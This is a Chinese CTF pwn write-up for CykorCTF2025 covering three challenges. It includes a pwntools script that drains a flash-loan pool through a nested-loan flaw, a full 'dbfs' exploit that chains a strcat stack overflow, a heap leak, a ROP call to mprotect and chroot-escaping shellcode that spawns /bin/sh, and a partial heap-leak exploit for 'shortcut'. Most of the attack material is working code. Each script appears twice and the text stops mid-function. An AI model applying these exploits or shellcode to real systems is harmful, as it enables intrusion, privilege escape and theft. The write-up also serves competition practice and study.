assets
0 KiB1970-01-01 07:59
README.mdx
10.4 KiB2025-12-08 15:31

# CykorCTF2025 Pwn 部分题解

## gram

内置的闪电贷合约有逻辑漏洞…

// Lends `amount` to `callback`, invokes its `on_flash_loan` hook, and then
// requires that the loan has been marked as repaid.
// NOTE(review): the outstanding loan is tracked in the single slot
// `storage.current_loan`. A nested flash_loan issued from inside the callback
// overwrites the outer amount; once the inner loan is repaid the slot reads 0,
// so the outer check below passes even though the outer loan was never
// returned.
pub fn flash_loan(amount: u64, callback: address) {
    ...
    storage.current_loan = amount;
    transfer(callback, amount);
    ...
    sync_call(callback, "on_flash_loan", amount, repay_amount);
    let remaining: u64 = storage.current_loan;
    require(remaining == 0, "flash loan not repaid");
}
// Accepts repayment for whatever loan is currently recorded.
// The required amount (loan + fee) is derived from `storage.current_loan` at
// call time, and a sufficient payment clears the slot to 0 regardless of which
// flash_loan invocation recorded it.
pub fn repay() {
    let received: u64 = msg.value;
    let loan: u64 = storage.current_loan;
    let fee: u64 = loan * fee_pct / 100;
    let required: u64 = loan + fee;
    require(received >= required, "insufficient repayment");
    storage.current_loan = 0;
}
// Lends `amount` to `callback`, invokes its `on_flash_loan` hook, and then
// requires that the loan has been marked as repaid.
// NOTE(review): the outstanding loan is tracked in the single slot
// `storage.current_loan`. A nested flash_loan issued from inside the callback
// overwrites the outer amount; once the inner loan is repaid the slot reads 0,
// so the outer check below passes even though the outer loan was never
// returned.
pub fn flash_loan(amount: u64, callback: address) {
    ...
    storage.current_loan = amount;
    transfer(callback, amount);
    ...
    sync_call(callback, "on_flash_loan", amount, repay_amount);
    let remaining: u64 = storage.current_loan;
    require(remaining == 0, "flash loan not repaid");
}
// Accepts repayment for whatever loan is currently recorded.
// The required amount (loan + fee) is derived from `storage.current_loan` at
// call time, and a sufficient payment clears the slot to 0 regardless of which
// flash_loan invocation recorded it.
pub fn repay() {
    let received: u64 = msg.value;
    let loan: u64 = storage.current_loan;
    let fee: u64 = loan * fee_pct / 100;
    let required: u64 = loan + fee;
    require(received >= required, "insufficient repayment");
    storage.current_loan = 0;
}

算是签到题了,像我这种区块链萌新都会做

from pwn import *
import re, hashlib, itertools

# Address of the remote `gram` challenge instance that main() connects to.
HOST = "43.203.37.155"
PORT = 58172

def leading_zero_bits(h: bytes) -> int:
    """Count the leading zero bits of a byte string.

    Args:
        h: Raw bytes, inspected starting from the first byte.

    Returns:
        The number of zero bits before the first set bit, or ``len(h) * 8``
        when every byte is zero (which includes empty input).
    """
    for i, b in enumerate(h):
        if b == 0:
            continue
        # First non-zero byte: i whole zero bytes plus its own leading zeros.
        return i * 8 + (8 - b.bit_length())
    return len(h) * 8

def solve_pow(prev_hex: str, miner_hex: str, diff: int) -> int:
    """Brute-force a proof-of-work nonce.

    Searches nonces 0, 1, 2, ... until
    ``sha256(prev || miner || nonce_le64)`` has at least ``diff`` leading
    zero bits.

    Args:
        prev_hex: Previous block hash as a hex string without prefix.
        miner_hex: Miner address as a hex string; its first two characters
            (the ``0x`` prefix) are skipped.
        diff: Required number of leading zero bits.

    Returns:
        The first nonce that satisfies the difficulty.
    """
    # The prefix never changes, so build it once outside the search loop.
    prefix = bytes.fromhex(prev_hex) + bytes.fromhex(miner_hex[2:])
    for n in itertools.count():
        h = hashlib.sha256(prefix + n.to_bytes(8, "little")).digest()
        if leading_zero_bits(h) >= diff:
            return n

def recv_prompt(r):
    """Read from tube ``r`` up to and including the next ``"> "`` prompt.

    Returns:
        The received bytes, prompt included.
    """
    return r.recvuntil(b"> ")

def parse_banner(txt: str):
    """Extract the addresses announced in the service banner.

    Args:
        txt: Banner text containing ``Account:``, ``Pool:`` and ``Flag:``
            lines, each followed by a lowercase ``0x``-prefixed hex address.

    Returns:
        A ``(account, pool, flag)`` tuple of address strings.

    Raises:
        AttributeError: If any of the three fields is missing from ``txt``.
    """
    acc = re.search(r"Account:\s+(0x[0-9a-f]+)", txt).group(1)
    pool = re.search(r"Pool:\s+(0x[0-9a-f]+)", txt).group(1)
    flag = re.search(r"Flag:\s+(0x[0-9a-f]+)", txt).group(1)
    return acc, pool, flag

def parse_work(txt: str):
    """Extract the mining parameters from a ``getwork`` response.

    Args:
        txt: Response text containing ``Previous hash:``, ``Miner:`` and
            ``Difficulty: N leading zero bits`` lines.

    Returns:
        A ``(prev_hash_hex, miner_address, difficulty)`` tuple; the
        difficulty is returned as an ``int``.

    Raises:
        AttributeError: If any of the three fields is missing from ``txt``.
    """
    prev = re.search(r"Previous hash:\s+([0-9a-f]+)", txt).group(1)
    miner = re.search(r"Miner:\s+(0x[0-9a-f]+)", txt).group(1)
    diff = int(re.search(r"Difficulty:\s+(\d+) leading zero bits", txt).group(1))
    return prev, miner, diff

def main():
    """Run the complete `gram` exploit against the remote service.

    Steps: read the banner addresses, mine until the reported balance is at
    least 3 tokens, deploy the re-entrant ``Attack`` contract, trigger a
    49999-token flash loan through it, then query the balance and call
    ``claim_flag`` on the flag contract, printing the final response.
    """
    r = remote(HOST, PORT)
    banner = recv_prompt(r).decode()
    acc, pool, flag = parse_banner(banner)
    log.info(f"acc={acc}, pool={pool}, flag={flag}")

    # Mine blocks until the service reports a balance of at least 3 tokens.
    # NOTE(review): presumably this covers the inner loan's repayment and
    # fee — confirm against the challenge source.
    balance = 0
    while balance < 3:
        r.sendline(b"getwork")
        txt = r.recvuntil(b"Submit with: submit <nonce>\n")
        txt += recv_prompt(r)
        prev, miner, diff = parse_work(txt.decode())
        nonce = solve_pow(prev, miner, diff)
        log.info(f"found nonce {nonce} for diff {diff}")
        r.sendline(f"submit {nonce}".encode())
        out = recv_prompt(r).decode()
        m = re.search(r"Balance:\s+(\d+) tokens", out)
        if m:
            balance = int(m.group(1))
        log.info(f"balance now {balance}")

    # Attack contract, sent verbatim and terminated by the "EOF" line.
    # For the outer loan (amount > 1) the callback takes a nested 1-token
    # flash loan, which overwrites and later clears current_loan, and then
    # forwards the outer loan to the owner. For the nested loan it simply
    # repays, which resets current_loan to 0.
    attack_code = f"""contract Attack {{
storage {{ owner: address, pool: address }}
pub fn init() {{
storage.owner = msg.sender;
storage.pool = {pool};
}}
pub fn on_flash_loan(amount: u64, repay_amount: u64) {{
let p: address = storage.pool;
if amount > 1 {{
sync_call(p, "flash_loan", 1, self.address); // 覆盖 current_loan 再清零
transfer(storage.owner, amount); // 偷走外层贷款
}} else {{
sync_call_with_value(p, "repay", repay_amount); // 偿还内层
}}
}}
}}
EOF
"""

    r.sendline(b"code")
    r.recvuntil(b"Enter contract code")
    for line in attack_code.splitlines():
        r.sendline(line.encode())
    deploy_out = recv_prompt(r).decode()
    m = re.search(r"Deployed:\s+(0x[0-9a-f]+)", deploy_out)
    attack_addr = m.group(1)
    log.info(f"attack deployed at {attack_addr}")

    # Outer flash loan: the callback keeps these tokens.
    r.sendline(f"call {pool} flash_loan 49999 {attack_addr}".encode())
    recv_prompt(r)

    r.sendline(b"balance")
    bal_out = recv_prompt(r).decode()
    log.info("balance output:\n" + bal_out)

    r.sendline(f"call {flag} claim_flag".encode())
    final_out = recv_prompt(r).decode(errors="ignore")
    print(final_out)

    r.sendline(b"exit")
    r.close()

# Run the exploit only when executed as a script.
if __name__ == "__main__":
    main()
from pwn import *
import re, hashlib, itertools

# Address of the remote `gram` challenge instance that main() connects to.
HOST = "43.203.37.155"
PORT = 58172

def leading_zero_bits(h: bytes) -> int:
    """Count the leading zero bits of a byte string.

    Args:
        h: Raw bytes, inspected starting from the first byte.

    Returns:
        The number of zero bits before the first set bit, or ``len(h) * 8``
        when every byte is zero (which includes empty input).
    """
    for i, b in enumerate(h):
        if b == 0:
            continue
        # First non-zero byte: i whole zero bytes plus its own leading zeros.
        return i * 8 + (8 - b.bit_length())
    return len(h) * 8

def solve_pow(prev_hex: str, miner_hex: str, diff: int) -> int:
    """Brute-force a proof-of-work nonce.

    Searches nonces 0, 1, 2, ... until
    ``sha256(prev || miner || nonce_le64)`` has at least ``diff`` leading
    zero bits.

    Args:
        prev_hex: Previous block hash as a hex string without prefix.
        miner_hex: Miner address as a hex string; its first two characters
            (the ``0x`` prefix) are skipped.
        diff: Required number of leading zero bits.

    Returns:
        The first nonce that satisfies the difficulty.
    """
    # The prefix never changes, so build it once outside the search loop.
    prefix = bytes.fromhex(prev_hex) + bytes.fromhex(miner_hex[2:])
    for n in itertools.count():
        h = hashlib.sha256(prefix + n.to_bytes(8, "little")).digest()
        if leading_zero_bits(h) >= diff:
            return n

def recv_prompt(r):
    """Read from tube ``r`` up to and including the next ``"> "`` prompt.

    Returns:
        The received bytes, prompt included.
    """
    return r.recvuntil(b"> ")

def parse_banner(txt: str):
    """Extract the addresses announced in the service banner.

    Args:
        txt: Banner text containing ``Account:``, ``Pool:`` and ``Flag:``
            lines, each followed by a lowercase ``0x``-prefixed hex address.

    Returns:
        A ``(account, pool, flag)`` tuple of address strings.

    Raises:
        AttributeError: If any of the three fields is missing from ``txt``.
    """
    acc = re.search(r"Account:\s+(0x[0-9a-f]+)", txt).group(1)
    pool = re.search(r"Pool:\s+(0x[0-9a-f]+)", txt).group(1)
    flag = re.search(r"Flag:\s+(0x[0-9a-f]+)", txt).group(1)
    return acc, pool, flag

def parse_work(txt: str):
    """Extract the mining parameters from a ``getwork`` response.

    Args:
        txt: Response text containing ``Previous hash:``, ``Miner:`` and
            ``Difficulty: N leading zero bits`` lines.

    Returns:
        A ``(prev_hash_hex, miner_address, difficulty)`` tuple; the
        difficulty is returned as an ``int``.

    Raises:
        AttributeError: If any of the three fields is missing from ``txt``.
    """
    prev = re.search(r"Previous hash:\s+([0-9a-f]+)", txt).group(1)
    miner = re.search(r"Miner:\s+(0x[0-9a-f]+)", txt).group(1)
    diff = int(re.search(r"Difficulty:\s+(\d+) leading zero bits", txt).group(1))
    return prev, miner, diff

def main():
    """Run the complete `gram` exploit against the remote service.

    Steps: read the banner addresses, mine until the reported balance is at
    least 3 tokens, deploy the re-entrant ``Attack`` contract, trigger a
    49999-token flash loan through it, then query the balance and call
    ``claim_flag`` on the flag contract, printing the final response.
    """
    r = remote(HOST, PORT)
    banner = recv_prompt(r).decode()
    acc, pool, flag = parse_banner(banner)
    log.info(f"acc={acc}, pool={pool}, flag={flag}")

    # Mine blocks until the service reports a balance of at least 3 tokens.
    # NOTE(review): presumably this covers the inner loan's repayment and
    # fee — confirm against the challenge source.
    balance = 0
    while balance < 3:
        r.sendline(b"getwork")
        txt = r.recvuntil(b"Submit with: submit <nonce>\n")
        txt += recv_prompt(r)
        prev, miner, diff = parse_work(txt.decode())
        nonce = solve_pow(prev, miner, diff)
        log.info(f"found nonce {nonce} for diff {diff}")
        r.sendline(f"submit {nonce}".encode())
        out = recv_prompt(r).decode()
        m = re.search(r"Balance:\s+(\d+) tokens", out)
        if m:
            balance = int(m.group(1))
        log.info(f"balance now {balance}")

    # Attack contract, sent verbatim and terminated by the "EOF" line.
    # For the outer loan (amount > 1) the callback takes a nested 1-token
    # flash loan, which overwrites and later clears current_loan, and then
    # forwards the outer loan to the owner. For the nested loan it simply
    # repays, which resets current_loan to 0.
    attack_code = f"""contract Attack {{
storage {{ owner: address, pool: address }}
pub fn init() {{
storage.owner = msg.sender;
storage.pool = {pool};
}}
pub fn on_flash_loan(amount: u64, repay_amount: u64) {{
let p: address = storage.pool;
if amount > 1 {{
sync_call(p, "flash_loan", 1, self.address); // 覆盖 current_loan 再清零
transfer(storage.owner, amount); // 偷走外层贷款
}} else {{
sync_call_with_value(p, "repay", repay_amount); // 偿还内层
}}
}}
}}
EOF
"""

    r.sendline(b"code")
    r.recvuntil(b"Enter contract code")
    for line in attack_code.splitlines():
        r.sendline(line.encode())
    deploy_out = recv_prompt(r).decode()
    m = re.search(r"Deployed:\s+(0x[0-9a-f]+)", deploy_out)
    attack_addr = m.group(1)
    log.info(f"attack deployed at {attack_addr}")

    # Outer flash loan: the callback keeps these tokens.
    r.sendline(f"call {pool} flash_loan 49999 {attack_addr}".encode())
    recv_prompt(r)

    r.sendline(b"balance")
    bal_out = recv_prompt(r).decode()
    log.info("balance output:\n" + bal_out)

    r.sendline(f"call {flag} claim_flag".encode())
    final_out = recv_prompt(r).decode(errors="ignore")
    print(final_out)

    r.sendline(b"exit")
    r.close()

# Run the exploit only when executed as a script.
if __name__ == "__main__":
    main()

## dbfs

出题人给了源码,实现了一个简单的文件系统:

  • SET <name> <type> [value]: 创建键或目录
  • GET <name>: 获取键值或列出目录内容
  • DELETE <name>: 删除键或目录
  • INFO <name>: 显示键或目录的详细信息
  • CHDIR <name>: 切换当前目录

handler_info 函数里,下面这段代码存在栈溢出漏洞:

getcwd(full_path, sizeof(full_path));
strcat(full_path, "/");
strcat(full_path, name);
getcwd(full_path, sizeof(full_path));
strcat(full_path, "/");
strcat(full_path, name);

strcat 没有做长度检查。但是问题是 strcat 默认会用 \x00 结尾,导致无法利用下面的 printf 泄漏地址,所以尝试找别的洞。

hex2bytes

审计了一会发现 hex2bytes 函数里,如果输入非法的 hex 这里解析会失败,导致堆块里残留的地址不会被覆盖掉,所以风水一下搞个 libc 地址就可以了。

然后在打 rop 的时候会发现 payload 里不能出现 \x00,不然会截断导致报错。写个栈迁移到堆上即可。

后续打 orw,但是题目执行前 chroot 了,得先逃逸。

程序 chroot 到 /tmp 了,所以 open 失败,ls 只能看到 . 和 ..

完整 exp 如下:

# code by littflower.
from pwn import *
from sys import argv

# Target binary and pwntools context for the dbfs exploit.
proc = "./client"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
# Pass "r" as the first argument to attack the remote service; with any other
# argument, or none at all, the local binary is spawned instead. The length
# check avoids an IndexError when the script is run without arguments.
io = remote("43.203.37.155", 22222) if len(argv) > 1 and argv[1] == 'r' else process(proc)
libc = ELF("./libc.so.6")

# Attach a debugger when the script is started with the pwntools `G` argument.
if args.G:
    gdb.attach(io)


def cmd(c):
    """Wait for the ``dbfs> `` prompt, then send command ``c`` as one line."""
    io.sendlineafter(b"dbfs> ", c)


# Template directory name and nesting depth used later to build a very long
# current working directory.
dir_name = b"A" * 255
deep_levels = 18

# Heap grooming followed by the leak. The values sent below ("AAAA…",
# "ZZZZ…") are not valid hex; per the write-up, hex2bytes then fails and
# leaves stale heap contents in place, which `GET barrier` prints back.
# NOTE(review): victimA is a bytes object, so the f-string embeds its repr
# (b'xxx…') rather than the raw bytes. The heap layout was presumably tuned
# with exactly this input, so it is left unchanged.
victimA = b"x" * 0xd0
cmd(f"SET {victimA} bytes ".encode() + b"A" * 0x400)
cmd(b"SET barrier bytes " + b"Z" * 0x100)
cmd(b"GET barrier")
io.recvuntil(b"Value (hex): ")
# First leaked qword (16 hex chars): a libc pointer. 0x203f70 is its offset
# from the libc base — specific to the shipped libc.so.6, TODO confirm.
libc.address = u64(bytes.fromhex(io.recv(16).decode())) - 0x203f70
# The second qword is skipped; the third is used as a heap pointer.
io.recv(16)
heap_base = u64(bytes.fromhex(io.recv(16).decode()))
log.info(f"libc.address => {hex(libc.address)}\nheap_addr => {hex(heap_base)}")

# Gadget offsets inside the shipped libc.so.6.
pop_rdi_ret = libc.address + 0x000000000010f78b
pop_rsi_ret = libc.address + 0x0000000000110a7d
pop_rax_ret = libc.address + 0x00000000000dd237
pop_rdx_ret = libc.address + 0x00000000000ab8a1
pop_rcx_ret = libc.address + 0x00000000000a877e
call_rax = libc.address + 0x000000000002a1c8
mprotect = libc.sym['mprotect']
ret = pop_rdi_ret + 1
# ROP chain: mprotect(page containing heap_base, 0x3000, 7 = RWX), then call
# heap_base + 0x1498, where the first-stage shellcode is expected to sit.
# NOTE(review): the purpose of loading rcx with heap_base is not evident from
# this script — presumably a requirement of one of the gadgets; confirm.
rop = flat([pop_rdi_ret, (heap_base) & 0xfffffffffffff000, pop_rsi_ret, 0x3000, pop_rcx_ret, heap_base, pop_rdx_ret, 7, mprotect, pop_rax_ret, heap_base + 0x1498, call_rax])

# Second-stage shellcode: a chroot escape followed by a shell
# (x86-64 Linux syscall numbers).
#   1. mkdir("esc", 0o755)             - syscall 83; 0x637365 is "esc"
#   2. chroot("esc")                   - syscall 161; jumps to exit on failure
#   3. chdir("..") repeated 50 times   - syscall 80; 0x2e2e is ".."
#   4. chroot(".")                     - syscall 161
#   5. execve("/bin/sh", NULL, NULL)   - syscall 59
#   exit_process: exit(0)              - syscall 60
escape_shellcode = f"""
_start:
xor rax, rax
push rax
mov rax, 0x637365
push rax
mov rdi, rsp
mov rsi, 0x1ed
mov rax, 83
syscall

mov rdi, rsp
mov rax, 161
syscall
test rax, rax
js exit_process

xor rax, rax
mov ax, 0x2e2e
push rax
mov rbx, 50

escape_loop:
mov rdi, rsp
mov rax, 80
syscall
dec rbx
jnz escape_loop

mov word ptr [rsp], 0x2e
mov rdi, rsp
mov rax, 161
syscall

xor rdx, rdx
xor rsi, rsi
mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp
mov rax, 59
syscall

exit_process:
mov rax, 60
xor rdi, rdi
syscall
"""

# Despite its name, `orw` holds the assembled chroot-escape shellcode.
orw = asm(escape_shellcode)

# Create and enter `deep_levels` nested directories with 255-byte names so
# the current working directory becomes very long; handler_info later
# concatenates cwd + "/" + name with unchecked strcat calls.
for i in range(deep_levels):
    suffix = ("%02d" % i).encode()
    name = dir_name[:-len(suffix)] + suffix
    cmd(b"SET " + name + b" set")
    cmd(b"CHDIR " + name)

# Key name whose tail is the low six bytes of heap_base + 0x1430; dropping
# the two top bytes keeps NUL bytes out of the name.
# NOTE(review): presumably this overwrites the saved frame pointer / return
# path to pivot the stack onto the heap, as the write-up describes — confirm
# in a debugger.
victimB = b"V" * 0xbf + p64(heap_base + 0x1430)[:-2]
log.info(f"mprotect => {hex(mprotect)}")

# First-stage shellcode: read(0, rsp, 0x300) to pull in the second stage.
reread = asm(shellcraft.read(0, "rsp", 0x300))
# Store the ROP chain and first stage on the heap as the key's value.
cmd(b"SET " + victimB + " bytes ".encode() + b"K" * 8 + rop + reread.ljust(0x100, b"A"))
pause()
# INFO on the long name triggers the strcat overflow in handler_info.
cmd(b"INFO " + victimB)
pause()
# NOP sled followed by the chroot-escape shellcode, consumed by the read.
io.sendline(b"\x90" * 0x20 + orw)
io.interactive()
# code by littflower.
from pwn import *
from sys import argv

# Target binary and pwntools context for the dbfs exploit.
proc = "./client"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
# Pass "r" as the first argument to attack the remote service; with any other
# argument, or none at all, the local binary is spawned instead. The length
# check avoids an IndexError when the script is run without arguments.
io = remote("43.203.37.155", 22222) if len(argv) > 1 and argv[1] == 'r' else process(proc)
libc = ELF("./libc.so.6")

# Attach a debugger when the script is started with the pwntools `G` argument.
if args.G:
    gdb.attach(io)


def cmd(c):
    """Wait for the ``dbfs> `` prompt, then send command ``c`` as one line."""
    io.sendlineafter(b"dbfs> ", c)


# Template directory name and nesting depth used later to build a very long
# current working directory.
dir_name = b"A" * 255
deep_levels = 18

# Heap grooming followed by the leak. The values sent below ("AAAA…",
# "ZZZZ…") are not valid hex; per the write-up, hex2bytes then fails and
# leaves stale heap contents in place, which `GET barrier` prints back.
# NOTE(review): victimA is a bytes object, so the f-string embeds its repr
# (b'xxx…') rather than the raw bytes. The heap layout was presumably tuned
# with exactly this input, so it is left unchanged.
victimA = b"x" * 0xd0
cmd(f"SET {victimA} bytes ".encode() + b"A" * 0x400)
cmd(b"SET barrier bytes " + b"Z" * 0x100)
cmd(b"GET barrier")
io.recvuntil(b"Value (hex): ")
# First leaked qword (16 hex chars): a libc pointer. 0x203f70 is its offset
# from the libc base — specific to the shipped libc.so.6, TODO confirm.
libc.address = u64(bytes.fromhex(io.recv(16).decode())) - 0x203f70
# The second qword is skipped; the third is used as a heap pointer.
io.recv(16)
heap_base = u64(bytes.fromhex(io.recv(16).decode()))
log.info(f"libc.address => {hex(libc.address)}\nheap_addr => {hex(heap_base)}")

# Gadget offsets inside the shipped libc.so.6.
pop_rdi_ret = libc.address + 0x000000000010f78b
pop_rsi_ret = libc.address + 0x0000000000110a7d
pop_rax_ret = libc.address + 0x00000000000dd237
pop_rdx_ret = libc.address + 0x00000000000ab8a1
pop_rcx_ret = libc.address + 0x00000000000a877e
call_rax = libc.address + 0x000000000002a1c8
mprotect = libc.sym['mprotect']
ret = pop_rdi_ret + 1
# ROP chain: mprotect(page containing heap_base, 0x3000, 7 = RWX), then call
# heap_base + 0x1498, where the first-stage shellcode is expected to sit.
# NOTE(review): the purpose of loading rcx with heap_base is not evident from
# this script — presumably a requirement of one of the gadgets; confirm.
rop = flat([pop_rdi_ret, (heap_base) & 0xfffffffffffff000, pop_rsi_ret, 0x3000, pop_rcx_ret, heap_base, pop_rdx_ret, 7, mprotect, pop_rax_ret, heap_base + 0x1498, call_rax])

# Second-stage shellcode: a chroot escape followed by a shell
# (x86-64 Linux syscall numbers).
#   1. mkdir("esc", 0o755)             - syscall 83; 0x637365 is "esc"
#   2. chroot("esc")                   - syscall 161; jumps to exit on failure
#   3. chdir("..") repeated 50 times   - syscall 80; 0x2e2e is ".."
#   4. chroot(".")                     - syscall 161
#   5. execve("/bin/sh", NULL, NULL)   - syscall 59
#   exit_process: exit(0)              - syscall 60
escape_shellcode = f"""
_start:
xor rax, rax
push rax
mov rax, 0x637365
push rax
mov rdi, rsp
mov rsi, 0x1ed
mov rax, 83
syscall

mov rdi, rsp
mov rax, 161
syscall
test rax, rax
js exit_process

xor rax, rax
mov ax, 0x2e2e
push rax
mov rbx, 50

escape_loop:
mov rdi, rsp
mov rax, 80
syscall
dec rbx
jnz escape_loop

mov word ptr [rsp], 0x2e
mov rdi, rsp
mov rax, 161
syscall

xor rdx, rdx
xor rsi, rsi
mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp
mov rax, 59
syscall

exit_process:
mov rax, 60
xor rdi, rdi
syscall
"""

# Despite its name, `orw` holds the assembled chroot-escape shellcode.
orw = asm(escape_shellcode)

# Create and enter `deep_levels` nested directories with 255-byte names so
# the current working directory becomes very long; handler_info later
# concatenates cwd + "/" + name with unchecked strcat calls.
for i in range(deep_levels):
    suffix = ("%02d" % i).encode()
    name = dir_name[:-len(suffix)] + suffix
    cmd(b"SET " + name + b" set")
    cmd(b"CHDIR " + name)

# Key name whose tail is the low six bytes of heap_base + 0x1430; dropping
# the two top bytes keeps NUL bytes out of the name.
# NOTE(review): presumably this overwrites the saved frame pointer / return
# path to pivot the stack onto the heap, as the write-up describes — confirm
# in a debugger.
victimB = b"V" * 0xbf + p64(heap_base + 0x1430)[:-2]
log.info(f"mprotect => {hex(mprotect)}")

# First-stage shellcode: read(0, rsp, 0x300) to pull in the second stage.
reread = asm(shellcraft.read(0, "rsp", 0x300))
# Store the ROP chain and first stage on the heap as the key's value.
cmd(b"SET " + victimB + " bytes ".encode() + b"K" * 8 + rop + reread.ljust(0x100, b"A"))
pause()
# INFO on the long name triggers the strcat overflow in handler_info.
cmd(b"INFO " + victimB)
pause()
# NOP sled followed by the chroot-escape shellcode, consumed by the read.
io.sendline(b"\x90" * 0x20 + orw)
io.interactive()

## shortcut

牢了最久的题。。

  • add delete run 时进行 overlap 检查
  • add 最多 8 个,大小固定 0x20,不限机会,但 run 之后不可用,必须先 reload
  • delete 功能释放所有堆块,最后一个槽位指针不置 0,两次机会
  • run 可以显示堆块内容并释放 img chunk,两次机会
  • reload 分配 img chunk,两次机会
  • rename 分配 0x30,并可控 0x10,一次机会

然后我写了一个泄漏 libc 和 heap base 的 exp 如下:

#!/usr/bin/env python3

from pwn import *
from sys import argv
import binascii
import struct

# Target binary and pwntools context for the shortcut exploit.
proc = "./shortcut_patched"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
libc = ELF("./libc.so.6", checksec=False)
# Pass "r" as the first argument to attack the remote service.
# NOTE(review): the remote host and port are blank here and must be filled
# in before remote mode can work.
io = remote("", ) if len(argv) > 1 and argv[1] == 'r' else process(proc)

# Attach a debugger with a breakpoint at binary offset 0x244a when the script
# is started with the pwntools `G` argument.
if args.G:
    gdb.attach(io, """
breakrva 0x244a
""")


def build_png():
    """Build a minimal PNG (signature + IHDR + IEND) padded to 2016 bytes.

    The IHDR chunk describes a 1x1, 8-bit RGB image. No image data chunk is
    emitted; the rest of the buffer is filled with ``b"A"``.

    Returns:
        A ``bytes`` object of exactly 2016 bytes.
    """
    sig = b"\x89PNG\r\n\x1a\n"
    # Width = 1, height = 1, then bit depth 8, colour type 2 (RGB) and
    # zeroed compression / filter / interlace bytes.
    ihdr_data = struct.pack(">II", 1, 1) + b"\x08\x02\x00\x00\x00"
    ihdr_body = b"IHDR" + ihdr_data
    # Chunk layout: big-endian length, type + data, CRC32 over type + data.
    ihdr = (
        struct.pack(">I", len(ihdr_data))
        + ihdr_body
        + struct.pack(">I", binascii.crc32(ihdr_body))
    )
    iend_body = b"IEND"
    iend = struct.pack(">I", 0) + iend_body + struct.pack(">I", binascii.crc32(iend_body))
    png = sig + ihdr + iend
    return png.ljust(2016, b"A")


def choose(idx):
    """Select menu entry ``idx`` at the ``"> "`` prompt."""
    io.sendlineafter(b"> ", str(idx).encode())


def add(idx, buf):
    """Menu option 1: store filter ``buf`` in slot ``idx``.

    Args:
        idx: Slot index (the service prompts for 0~7).
        buf: Filter contents; the service asks for exactly 16 bytes.
    """
    choose(1)
    io.sendlineafter(b'slot index (0~7)? ', str(idx).encode())
    io.sendafter(f'send exactly 16 bytes for filter[{idx}]\n'.encode(), buf)


def delete():
    """Menu option 2: delete (per the write-up, this frees every filter chunk)."""
    choose(2)


def run(size, buf):
    """Menu option 3: run the filters with an optional watermark.

    Args:
        size: Watermark length (the service prompts for 0~32).
        buf: Watermark bytes; only sent when ``size`` is non-zero.
    """
    choose(3)
    io.sendlineafter(b'watermark length (0~32)? ', str(size).encode())
    if size:
        io.sendafter(b'send 32 bytes for watermark\n', buf)


def reload():
    """Menu option 4: reload, sending a fresh 2016-byte PNG image."""
    choose(4)
    # io.send(b"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a" + cyclic(2016 - 8, n=8))
    io.send(build_png())


def rename():
    """Menu option 5: rename (only selects the entry; sends no data)."""
    choose(5)


def name(buf):
    """Answer the initial name prompt and parse the address printed back.

    Args:
        buf: Name to send.

    Returns:
        The hexadecimal value that follows ``": "`` in the reply, as an int.
    """
    io.recvuntil(b"What is your name?\n")
    io.sendline(buf)
    io.recvuntil(b": ")
    # The reply line carries a hex address (used by the caller as main's).
    return int(io.recvuntil(b"\n", drop=True).decode(), 16)


def leak():
    """Read the 8 bytes that follow the ``fiLT\\x80`` marker as a u64."""
    io.recvuntil(b"fiLT\x80")
    return u64(io.recv(8))


# The service prints an address after the name prompt; 0x24f5 is taken as
# main's offset inside the binary, giving the PIE base.
main_addr = name(b"aaa")
pie_addr = main_addr - 0x24f5
log.info(f"pie_addr => {hex(pie_addr)}")
# Initial image upload.
io.send(build_png())


# Fill all eight filter slots, then free them with a single delete.
for i in range(8):
    add(i, b"A"*16)
delete()
# The first run prints the stale chunk contents.
# NOTE(review): the leaked qword is presumably a safe-linking value
# (heap address >> 12), hence the shift — confirm in a debugger.
run(0, b"")
heap_base = leak() << 12
reload()
# The second run leaks a libc pointer; 0x203b20 is its offset from the libc
# base for the shipped libc.so.6 — TODO confirm.
run(0, b"")
libc.address = leak() - 0x203b20
log.info(f"libc_addr => {hex(libc.address)}\nheap_base => {hex(heap_base)}")

reload()
# Unfinished follow-up steps, kept for reference:
# delete()
# rename()
# for i in range(6):
#     add(i, b"A" * 16)
io.interactive()
#!/usr/bin/env python3

from pwn import *
from sys import argv
import binascii
import struct

# Target binary and pwntools context for the shortcut exploit.
proc = "./shortcut_patched"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
libc = ELF("./libc.so.6", checksec=False)
# Pass "r" as the first argument to attack the remote service.
# NOTE(review): the remote host and port are blank here and must be filled
# in before remote mode can work.
io = remote("", ) if len(argv) > 1 and argv[1] == 'r' else process(proc)

# Attach a debugger with a breakpoint at binary offset 0x244a when the script
# is started with the pwntools `G` argument.
if args.G:
    gdb.attach(io, """
breakrva 0x244a
""")


def build_png():
    """Build a minimal PNG (signature + IHDR + IEND) padded to 2016 bytes.

    The IHDR chunk describes a 1x1, 8-bit RGB image. No image data chunk is
    emitted; the rest of the buffer is filled with ``b"A"``.

    Returns:
        A ``bytes`` object of exactly 2016 bytes.
    """
    sig = b"\x89PNG\r\n\x1a\n"
    # Width = 1, height = 1, then bit depth 8, colour type 2 (RGB) and
    # zeroed compression / filter / interlace bytes.
    ihdr_data = struct.pack(">II", 1, 1) + b"\x08\x02\x00\x00\x00"
    ihdr_body = b"IHDR" + ihdr_data
    # Chunk layout: big-endian length, type + data, CRC32 over type + data.
    ihdr = (
        struct.pack(">I", len(ihdr_data))
        + ihdr_body
        + struct.pack(">I", binascii.crc32(ihdr_body))
    )
    iend_body = b"IEND"
    iend = struct.pack(">I", 0) + iend_body + struct.pack(">I", binascii.crc32(iend_body))
    png = sig + ihdr + iend
    return png.ljust(2016, b"A")


def choose(idx):
    """Select menu entry ``idx`` at the ``"> "`` prompt."""
    io.sendlineafter(b"> ", str(idx).encode())


def add(idx, buf):
    """Menu option 1: store filter ``buf`` in slot ``idx``.

    Args:
        idx: Slot index (the service prompts for 0~7).
        buf: Filter contents; the service asks for exactly 16 bytes.
    """
    choose(1)
    io.sendlineafter(b'slot index (0~7)? ', str(idx).encode())
    io.sendafter(f'send exactly 16 bytes for filter[{idx}]\n'.encode(), buf)


def delete():
    """Menu option 2: delete (per the write-up, this frees every filter chunk)."""
    choose(2)


def run(size, buf):
    """Menu option 3: run the filters with an optional watermark.

    Args:
        size: Watermark length (the service prompts for 0~32).
        buf: Watermark bytes; only sent when ``size`` is non-zero.
    """
